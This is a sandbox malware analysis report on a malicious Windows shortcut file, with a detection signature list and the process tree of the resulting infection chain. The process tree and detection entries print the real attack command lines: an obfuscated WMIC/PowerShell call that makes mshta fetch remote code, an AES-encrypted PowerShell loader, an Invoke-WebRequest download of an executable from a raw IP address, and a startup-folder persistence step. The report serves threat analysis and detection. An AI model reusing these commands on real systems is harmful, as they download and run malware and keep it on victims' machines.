Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7A2lfjTYNf.lnk

Overview

General Information

Sample name:7A2lfjTYNf.lnk
renamed because original name is a hash value
Original sample name:767810929a7b0dddecaad84a15aed733.lnk
Analysis ID:1579758
MD5:767810929a7b0dddecaad84a15aed733
SHA1:529f0a59889968b60a992452e3d3bd876a7a02bc
SHA256:295fae2f581e04308ae737dd0ee934da80099da2d9b3e90d7d907a57265b2a91
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Contains functionality to create processes via WMI
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • WMIC.exe (PID: 4148 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5412 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghepduy1325" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 5172 cmdline: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghepduy1325 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '4734F167E688B712E3D248343D2E8F27F45EFEB66CEF33E5F71E91F4D577D03D307A3816965837CD191787DF5ED88323F20D1C6944C9100F6D044DB74B45638F201D8BAE55A1DE539BF3C012438184FFECF2A18AA75A38B5FA2B30E3775A68700359403C96690A310E0FA61DE6143A7A471CABD4AE708C72CF84B7A1DC559F9DCF0AABDD03FCA45762903F51468BEF8488494E7B7429432A3A1BAEDBF4833DEEA70781E018E4DFB87CD05CEA8267DFEEC57474934D2E72FED942DC3B6E04D01F82804DECEF13DC95D9F76B95330BE652C3F5ECAB21E4D67450285F38D92BE31580C4E736177BF71474B83457639E9C2881131387C24401F97A86AE28EF1CFA3564CF1974B4ACC0F6695257FA23A2DDB11745C35D97B3064A0BAAF7A97272149C51840237CA06689453D6A5F8B46678E8011672959BFCB6DFD142A3ED66ADE572299E442A73D667DF9462BE96290706311211F2CE31646E4040EBF2F7AA2CB9DC7FCF0E3D67762E76457BAA609917136F01E489A97E9A7FB17C6965F15CFF50FF5637D62983F02A4262193FDA98C9A16EF2DA91F27193760578614D5E2613AC07AC1CCB5EF6F587BC781DF31F55B65181C86F562B2BD2A35461CAC5C101B21214506A52C17834FA44C6E0DEF1A1E9CB0715D93135D5BBF09E6FCCE528E1DA3761E0A1F265D5F0FB3FA2E21AC770F6F27CC1EC289352FC35A8C7DE18C442B194FDCFA10DB3DA7CDE32FD8403F449D8FC75BE84A071B70C8F5544157502E7B2071633BA5B9D659AB9028E480647AA8FE41712E40CDB4E6A26F3268BFCF26F9072B471B8C282387E4DBA4EBC93609965409C1A65C0C57DF0CE49EC876F91C5A96386BD60817F78D48A9D0148412611DA9639CF9834309BE5DACA432F3ACBDFA219E5B95B26C009CFC00CF54BE154220779009DDC479CBDFEB32FC40336CC86D179FF44CD5B390F941A50D06D52FAFC8F32DB72C3505502F57C9EAA8B71200A218380D35F04EDC8E95B91FA86829B4510AD91625BBE54DB1D3237B08832E5C8289753B1D32B208E9E6AA7E281982490307DB6935EA25109C185FC165625387C55175929D993B0A9A3B1022C240A5ACB0431E98C81D66C70D1DC29B7F9909E6515937CDB3D283F4B12B4C4D6E3F28F0B7F5FD07BA8EDC2B28158165A3FB91BF281D1C320E33D3C8D25C1ABC674AB74EA1BE51CF9A35EC73C41528008D4E8200333FAB1BFEDC6C324ED62E667038A747AA71059CF2CF52ED74304019637D834465D06062AAA679880D486BEED29E51CBB32E274D08CF418E16AC10216BB620E504A77D4771DF75717D83FEB1DA9EA2224B0AB6051F81C35169397369EDE2B5FCAD429BA6B5E93A03CD2128D91B05F33C31AA36E6F16AFEB422B869409A043987E74028E99F3553B4AC0943C7347DBDB9818608468516E754F4271494E6951625143456D';function yVE ($UZpVPhOy){return -split ($UZpVPhOy -replace '..', '0x$& ')};$foocSK = yVE($ddg.SubString(0, 2016));$vAM = [System.Security.Cryptography.Aes]::Create();$vAM.Key = yVE($ddg.SubString(2016));$vAM.IV = New-Object byte[] 16;$MnEAtBA = $vAM.CreateDecryptor();$QXykJ = [System.String]::new($MnEAtBA.TransformFinalBlock($foocSK, 0,$foocSK.Length)); sal fd $QXykJ.Substring(3,3); fd $QXykJ.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Acrobat.exe (PID: 7756 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 7956 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 8124 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1596,i,13836792171696391892,6566973636645197800,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • dqcwif.exe (PID: 4412 cmdline: "C:\Users\user\AppData\Roaming\dqcwif.exe" MD5: 302EA0EBB32FF34A46D6B6DF1E66F9FE)
              • powershell.exe (PID: 8156 cmdline: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 8428 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 8436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • Guard.exe (PID: 8720 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
                  • cmd.exe (PID: 8744 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 8752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6308 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 8900 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 8964 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8428, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 8720, ProcessName: Guard.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\dqcwif.exe" , ParentImage: C:\Users\user\AppData\Roaming\dqcwif.exe, ParentProcessId: 4412, ParentProcessName: dqcwif.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 8428, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 8720, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 8744, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghepduy1325, CommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghepduy1325, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghepduy1325", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6540, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghepduy1325, ProcessId: 5172, ProcessName: mshta.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\dqcwif.exe" , ParentImage: C:\Users\user\AppData\Roaming\dqcwif.exe, ParentProcessId: 4412, ParentProcessName: dqcwif.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 8428, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\dqcwif.exe" , ParentImage: C:\Users\user\AppData\Roaming\dqcwif.exe, ParentProcessId: 4412, ParentProcessName: dqcwif.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 8156, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '4734F167E688B712E3D248343D2E8F27F45EFEB66CEF33E5F71E91F4D577D03D307A3816965837CD191787DF5ED88323F20D1C6944C9100F6D044DB74B45638F201D8BAE55A1DE539BF3C012438184FFECF2A18AA75A38B5FA2B30E3775A68700359403C96690A310E0FA61DE6143A7A471CABD4AE708C72CF84B7A1DC559F9DCF0AABDD03FCA45762903F51468BEF8488494E7B7429432A3A1BAEDBF4833DEEA70781E018E4DFB87CD05CEA8267DFEEC57474934D2E72FED942DC3B6E04D01F82804DECEF13DC95D9F76B95330BE652C3F5ECAB21E4D67450285F38D92BE31580C4E736177BF71474B83457639E9C2881131387C24401F97A86AE28EF1CFA3564CF1974B4ACC0F6695257FA23A2DDB11745C35D97B3064A0BAAF7A97272149C51840237CA06689453D6A5F8B46678E8011672959BFCB6DFD142A3ED66ADE572299E442A73D667DF9462BE96290706311211F2CE31646E4040EBF2F7AA2CB9DC7FCF0E3D67762E76457BAA609917136F01E489A97E9A7FB17C6965F15CFF50FF5637D62983F02A4262193FDA98C9A16EF2DA91F27193760578614D5E2613AC07AC1CCB5EF6F587BC781DF31F55B65181C86F562B2BD2A35461CAC5C101B21214506A52C17834FA44C6E0DEF1A1E9CB0715D93135D5BBF09E6FCCE528E1DA3761E0A1F265D5F0FB3FA2E21AC770F6F27CC1EC289352FC35A8C7DE18C442B194FDCFA10DB3DA7CDE32FD8403F449D8FC75BE84A071B70C8F5544157502E7B2071633BA5B9D659AB9028E480647AA8FE41712E40CDB4E6A26F3268BFCF26F9072B471B8C282387E4DBA4EBC93609965409C1A65C0C57DF0CE49EC876F91C5A96386BD60817F78D48A9D0148412611DA9639CF9834309BE5DACA432F3ACBDFA219E5B95B26C009CFC00CF54BE154220779009DDC479CBDFEB32FC40336CC86D179FF44CD5B390F941A50D06D52FAFC8F32DB72C3505502F57C9EAA8B71200A218380D35F04EDC8E95B91FA86829B4510AD91625BBE54DB1D3237B08832E5C8289753B1D32B208E9E6AA7E281982490307DB6935EA25109C185FC165625387C55175929D993B0A9A3B1022C240A5ACB0431E98C81D66C70D1DC29B7F9909E6515937CDB3D283F4B12B4C4D6E3F28F0B7F5FD07BA8EDC2B28158165A3FB91BF281D1C320E33D3C8D25C1ABC674AB74EA1BE51CF9A35EC73C41528008D4E8200333FAB1BFEDC6C324ED62E667038A747AA71059CF2CF52ED74304019637D834465D06062AAA679880D486BEED29E51CBB32E274D08CF418E16AC10216BB620E504A77D4771DF75717D83FEB1DA9EA2224B0AB6051F81C35169397369EDE2B5FCAD429BA6B5E93A03CD2128D91B05F33C31AA36E6F16AFEB422B869409A043987E74028E99F3553B4AC0943C7347DBDB9818608468516E754F4271494E6951625143456D';function yVE ($UZpVPhOy){return -split ($UZpVPhOy -replace '..', '0x$& ')};$foocSK = yVE($ddg.SubString(0, 2016));$vAM = [System.Security.Cryptography.Aes]::Create();$vAM.Key = yVE($ddg.SubString(2016));$vAM.IV = New-Object byte[] 16;$MnEAtBA = $vAM.CreateDecryptor();$QXykJ = [System.String]::new($MnEAtBA.TransformFinalBlock($foocSK, 0,$foocSK.Length)); sal fd $QXykJ.Substring(3,3); fd $QXykJ.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '4734F167E688B712E3D248343D2E8F27F45EFEB66CEF33E5F71E91F4D577D03D307A3816965837CD191787DF5ED88323F20D1C6944C9100F6D044DB74B45638F201D8BAE55A1DE539BF3C012438184FFECF2A18AA75A38B5FA2B30E3775A68700359403C96690A310E0FA61DE6143A7A471CABD4AE708C72CF84B7A1DC559F9DCF0AABDD03FCA45762903F51468BEF8488494E7B7429432A3A1BAEDBF4833DEEA7
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325')", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325')", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325')", ProcessId: 4148, ProcessName: WMIC.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 8900, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8156, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '4734F167E688B712E3D248343D2E8F27F45EFEB66CEF33E5F71E91F4D577D03D307A3816965837CD191787DF5ED88323F20D1C6944C9100F6D044DB74B45638F201D8BAE55A1DE539BF3C012438184FFECF2A18AA75A38B5FA2B30E3775A68700359403C96690A310E0FA61DE6143A7A471CABD4AE708C72CF84B7A1DC559F9DCF0AABDD03FCA45762903F51468BEF8488494E7B7429432A3A1BAEDBF4833DEEA70781E018E4DFB87CD05CEA8267DFEEC57474934D2E72FED942DC3B6E04D01F82804DECEF13DC95D9F76B95330BE652C3F5ECAB21E4D67450285F38D92BE31580C4E736177BF71474B83457639E9C2881131387C24401F97A86AE28EF1CFA3564CF1974B4ACC0F6695257FA23A2DDB11745C35D97B3064A0BAAF7A97272149C51840237CA06689453D6A5F8B46678E8011672959BFCB6DFD142A3ED66ADE572299E442A73D667DF9462BE96290706311211F2CE31646E4040EBF2F7AA2CB9DC7FCF0E3D67762E76457BAA609917136F01E489A97E9A7FB17C6965F15CFF50FF5637D62983F02A4262193FDA98C9A16EF2DA91F27193760578614D5E2613AC07AC1CCB5EF6F587BC781DF31F55B65181C86F562B2BD2A35461CAC5C101B21214506A52C17834FA44C6E0DEF1A1E9CB0715D93135D5BBF09E6FCCE528E1DA3761E0A1F265D5F0FB3FA2E21AC770F6F27CC1EC289352FC35A8C7DE18C442B194FDCFA10DB3DA7CDE32FD8403F449D8FC75BE84A071B70C8F5544157502E7B2071633BA5B9D659AB9028E480647AA8FE41712E40CDB4E6A26F3268BFCF26F9072B471B8C282387E4DBA4EBC93609965409C1A65C0C57DF0CE49EC876F91C5A96386BD60817F78D48A9D0148412611DA9639CF9834309BE5DACA432F3ACBDFA219E5B95B26C009CFC00CF54BE154220779009DDC479CBDFEB32FC40336CC86D179FF44CD5B390F941A50D06D52FAFC8F32DB72C3505502F57C9EAA8B71200A218380D35F04EDC8E95B91FA86829B4510AD91625BBE54DB1D3237B08832E5C8289753B1D32B208E9E6AA7E281982490307DB6935EA25109C185FC165625387C55175929D993B0A9A3B1022C240A5ACB0431E98C81D66C70D1DC29B7F9909E6515937CDB3D283F4B12B4C4D6E3F28F0B7F5FD07BA8EDC2B28158165A3FB91BF281D1C320E33D3C8D25C1ABC674AB74EA1BE51CF9A35EC73C41528008D4E8200333FAB1BFEDC6C324ED62E667038A747AA71059CF2CF52ED74304019637D834465D06062AAA679880D486BEED29E51CBB32E274D08CF418E16AC10216BB620E504A77D4771DF75717D83FEB1DA9EA2224B0AB6051F81C35169397369EDE2B5FCAD429BA6B5E93A03CD2128D91B05F33C31AA36E6F16AFEB422B869409A043987E74028E99F3553B4AC0943C7347DBDB9818608468516E754F4271494E6951625143456D';function yVE ($UZpVPhOy){return -split ($UZpVPhOy -replace '..', '0x$& ')};$foocSK = yVE($ddg.SubString(0, 2016));$vAM = [System.Security.Cryptography.Aes]::Create();$vAM.Key = yVE($ddg.SubString(2016));$vAM.IV = New-Object byte[] 16;$MnEAtBA = $vAM.CreateDecryptor();$QXykJ = [System.String]::new($MnEAtBA.TransformFinalBlock($foocSK, 0,$foocSK.Length)); sal fd $QXykJ.Substring(3,3); fd $QXykJ.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '4734F167E688B712E3D248343D2E8F27F45EFEB66CEF33E5F71E91F4D577D03D307A3816965837CD191787DF5ED88323F20D1C6944C9100F6D044DB74B45638F201D8BAE55A1DE539BF3C012438184FFECF2A18AA75A38B5FA2B30E3775A68700359403C96690A310E0FA61DE6143A7A471CABD4AE708C72CF84B7A1DC559F9DCF0AABDD03FCA45762903F51468BEF8488494E7B7429432A3A1BAEDBF4833DEEA7
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8900, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 8964, ProcessName: SwiftWrite.pif
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 672, TargetFilename: C:\Users\user\AppData\Roaming\dqcwif.exe
